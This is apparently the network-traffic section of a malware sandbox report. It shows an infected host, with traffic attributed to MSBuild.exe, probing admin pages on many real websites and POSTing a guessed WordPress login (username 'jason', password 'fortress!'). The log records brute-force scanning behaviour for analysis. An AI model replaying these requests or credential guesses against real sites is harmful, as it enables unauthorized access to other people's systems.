2024-02-20 23:26:16 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
210	192.168.2.6	49215	85.13.138.112	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:16 UTC	169	OUT	GET /admin.php HTTP/1.1 Host: popular.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:16 UTC	306	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:16 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 03 May 2022 09:55:24 GMT ETag: "4ef-5de1881ee1b00;5de1892c31bf7 Accept-Ranges: bytes Content-Length: 1263 Vary: Accept-Encoding,User-Agent Content-Type: text/html
2024-02-20 23:26:16 UTC	1263	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 69 63 6f 6e 20 68 72 65 66 3d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3e 3c 74 69 74 6c 65 3e 50 4f 50 55 4c 41 52 20 e2 80 93 20 53 6d 61 72 74 20 63 6f 6d 6d 75 6e 69 63 61 Data Ascii: <!DOCTYPE html><html lang=en><head><meta charset=utf-8><meta http-equiv=X-UA-Compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no"><link rel=icon href=/favicon.ico><title>POPULAR Smart communica

Session ID	Source IP	Source Port	Destination IP	Destination Port
211	192.168.2.6	49273	144.91.85.110	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:16 UTC	169	OUT	GET /admin.php HTTP/1.1 Host: m-viper.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:16 UTC	189	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:16 GMT Content-Type: text/html Content-Length: 146 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding
2024-02-20 23:26:16 UTC	146	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
212	192.168.2.6	49373	217.26.61.200	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:16 UTC	171	OUT	GET /wp-login.php HTTP/1.1 Host: eskimo.ch Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:17 UTC	192	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:16 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:17 UTC	8000	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 2d 43 48 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 20 3e 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 45 73 6b 69 6d 6f 20 54 65 78 74 69 6c 20 41 47 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 3c 21 2d 2d 20 41 6c 6c 20 69 6e 20 4f 6e 65 20 53 45 4f 20 34 2e 35 2e 36 20 2d 20 61 69 6f 73 65 6f 2e 63 6f 6d 20 2d 2d 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 Data Ascii: 2000<!DOCTYPE html><html dir="ltr" lang="de-CH" prefix="og: https://ogp.me/ns#"><head ><title>Seite nicht gefunden – Eskimo Textil AG</title>... All in One SEO 4.5.6 - aioseo.com --><meta name="robots" content="noindex" /><meta name="ge
2024-02-20 23:26:17 UTC	198	IN	Data Raw: 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 2d 63 73 73 2d 6f 70 61 63 69 74 79 7b 6f 70 61 63 69 74 79 3a 2e 34 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 2d 61 6c 70 68 61 2d 63 68 61 6e 6e 65 6c 2d 6f 70 61 63 69 74 79 7b 6f 70 61 63 69 74 79 3a 31 7d 2e 77 70 Data Ascii: }.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp
2024-02-20 23:26:17 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:17 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 77 69 64 65 29 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 64 6f 74 73 29 7b 77 69 64 74 68 3a 31 30 30 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 64 6f 74 73 29 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 31 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 77 69 64 65 29 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 64 6f 74 73 29 7b 68 65 69 67 68 74 3a 32 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b Data Ascii: 2000-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){border-bottom:none;height:1px}.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){height:2px}.wp-block
2024-02-20 23:26:17 UTC	6	IN	Data Raw: 63 6f 6c 6f 72 7b Data Ascii: color{
2024-02-20 23:26:17 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:17 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: 2000border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color
2024-02-20 23:26:17 UTC	6	IN	Data Raw: 65 6d 65 6e 74 6f Data Ascii: emento
2024-02-20 23:26:17 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:17 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 72 2d 69 63 6f 6e 2c 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 2e 65 6c 65 6d 65 6e 74 6f 72 2d 76 69 65 77 2d 64 65 66 61 75 6c 74 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 7b 63 6f 6c 6f 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 20 29 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 20 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 2e 65 6c 65 6d 65 6e 74 6f 72 2d 76 69 65 77 2d 66 72 61 6d 65 64 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2c 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 Data Ascii: 2000r-icon, .elementor-widget-divider.elementor-view-default .elementor-icon{color:var( --e-global-color-secondary );border-color:var( --e-global-color-secondary );}.elementor-widget-divider.elementor-view-framed .elementor-icon, .elementor-widget-divid

Session ID	Source IP	Source Port	Destination IP	Destination Port
213	192.168.2.6	49546	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:16 UTC	168	OUT	GET /admin HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:16 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:16 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_YKQUzAEONVAtPtsG4Yzo9mWF7bAKWluVb6sJ+iFJUwNVloyZISuOBW6eq0WY3+8ICBumwMw+KwrgYdEvIusjfA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:16 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
214	192.168.2.6	49615	62.210.211.126	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:16 UTC	178	OUT	GET /pma/ HTTP/1.1 Host: voltage-distribution.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:17 UTC	180	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 287 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-02-20 23:26:17 UTC	287	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 76 6f 6c 74 61 67 65 2d 64 69 73 74 72 69 62 75 74 69 6f 6e 2e 63 6f 6d 20 50 6f Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at voltage-distribution.com Po

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
215	192.168.2.6	49730	104.21.54.169	443	3532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:16 UTC	362	OUT	POST /wp-login.php HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://fortressrealcapital.com/wp-login.php Content-Length: 138 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:16 UTC	138	OUT	Data Raw: 6c 6f 67 3d 6a 61 73 6f 6e 26 70 77 64 3d 66 6f 72 74 72 65 73 73 25 32 31 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=jason&pwd=fortress%21&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Ffortressrealcapital.com%2Fwp-admin%2F&testcookie=1
2024-02-20 23:26:17 UTC	810	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 x-frame-options: SAMEORIGIN set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oZsj3ZTMDzR0Iz2VHv1gOrVJq%2B%2Br9Ec1%2Bmz3kv8bqwKZWNj7PIJPx7Qiw2F7WFvDkTnDganoxxVpv6dyEdBXlXYc1sAMb6BISrpOv%2BoEoqoB%2BpI1Acm%2BymFM7pfJTxUIh4hQnCKdplH1sA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a837aafc24314-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:26:17 UTC	559	IN	Data Raw: 31 62 62 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 46 6f 72 74 72 65 73 73 20 52 65 61 6c 20 43 61 70 69 74 61 6c 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 Data Ascii: 1bbc<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Fortress Real Capital — WordPress</title><meta name='robots' content='noindex, follow' /><link rel='
2024-02-20 23:26:17 UTC	1369	IN	Data Raw: 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 33 27 20 74 79 70 65 3d Data Ascii: el='stylesheet' id='forms-css' href='https://fortressrealcapital.com/wp-admin/css/forms.min.css?ver=6.4.3' type='text/css' media='all' /><link rel='stylesheet' id='l10n-css' href='https://fortressrealcapital.com/wp-admin/css/l10n.min.css?ver=6.4.3' type=
2024-02-20 23:26:17 UTC	1369	IN	Data Raw: 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 22 3e 50 6f 77 65 72 65 64 20 62 79 20 57 6f 72 64 50 72 65 73 73 3c 2f 61 3e 3c 2f 68 31 3e 0a 09 3c 64 69 76 20 69 64 3d 22 6c 6f 67 69 6e 5f 65 72 72 6f 72 22 20 63 6c 61 73 73 3d 22 6e 6f 74 69 63 65 20 6e 6f 74 69 63 65 2d 65 72 72 6f 72 22 3e 3c 70 3e 3c 73 74 72 6f 6e 67 3e 45 72 72 6f 72 3a 3c 2f 73 74 72 6f 6e 67 3e 20 54 68 65 20 75 73 65 72 6e 61 6d 65 20 3c 73 74 72 6f 6e 67 3e 6a 61 73 6f 6e 3c 2f 73 74 72 6f 6e 67 3e 20 69 73 20 6e 6f 74 20 72 65 67 69 73 74 65 72 65 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 20 49 66 20 79 6f 75 20 61 72 65 20 75 6e 73 75 72 65 20 6f 66 20 79 6f 75 72 20 75 73 65 72 6e 61 6d 65 2c 20 74 72 79 20 79 6f 75 72 20 Data Ascii: ><a href="https://wordpress.org/">Powered by WordPress</a></h1><div id="login_error" class="notice notice-error"><p><strong>Error:</strong> The username <strong>jason</strong> is not registered on this site. If you are unsure of your username, try your
2024-02-20 23:26:17 UTC	1369	IN	Data Raw: 61 62 65 6c 3e 3c 2f 70 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 73 75 62 6d 69 74 22 3e 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 6e 61 6d 65 3d 22 77 70 2d 73 75 62 6d 69 74 22 20 69 64 3d 22 77 70 2d 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 20 62 75 74 74 6f 6e 2d 70 72 69 6d 61 72 79 20 62 75 74 74 6f 6e 2d 6c 61 72 67 65 22 20 76 61 6c 75 65 3d 22 4c 6f 67 20 49 6e 22 20 2f 3e 0a 09 09 09 09 09 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 72 65 64 69 72 65 63 74 5f 74 6f 22 20 76 61 6c 75 65 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 22 20 2f 3e 0a 09 09 09 Data Ascii: abel></p><p class="submit"><input type="submit" name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" /><input type="hidden" name="redirect_to" value="https://fortressrealcapital.com/wp-admin/" />
2024-02-20 23:26:17 UTC	1369	IN	Data Raw: 76 61 73 63 72 69 70 74 22 20 69 64 3d 22 7a 78 63 76 62 6e 2d 61 73 79 6e 63 2d 6a 73 2d 65 78 74 72 61 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 5f 7a 78 63 76 62 6e 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 7a 78 63 76 62 6e 2e 6d 69 6e 2e 6a 73 22 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 Data Ascii: vascript" id="zxcvbn-async-js-extra">/* <![CDATA[ /var _zxcvbnSettings = {"src":"https:\/\/fortressrealcapital.com\/wp-includes\/js\/zxcvbn.min.js"};/ ... */</script><script type="text/javascript" src="https://fortressrealcapital.com/wp-includes/js
2024-02-20 23:26:17 UTC	1073	IN	Data Raw: 30 6e 20 3d 20 7b 22 75 6e 6b 6e 6f 77 6e 22 3a 22 50 61 73 73 77 6f 72 64 20 73 74 72 65 6e 67 74 68 20 75 6e 6b 6e 6f 77 6e 22 2c 22 73 68 6f 72 74 22 3a 22 56 65 72 79 20 77 65 61 6b 22 2c 22 62 61 64 22 3a 22 57 65 61 6b 22 2c 22 67 6f 6f 64 22 3a 22 4d 65 64 69 75 6d 22 2c 22 73 74 72 6f 6e 67 22 3a 22 53 74 72 6f 6e 67 22 2c 22 6d 69 73 6d 61 74 63 68 22 3a 22 4d 69 73 6d 61 74 63 68 22 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 6a 73 2f 70 61 73 73 77 6f 72 64 2d 73 74 72 65 6e 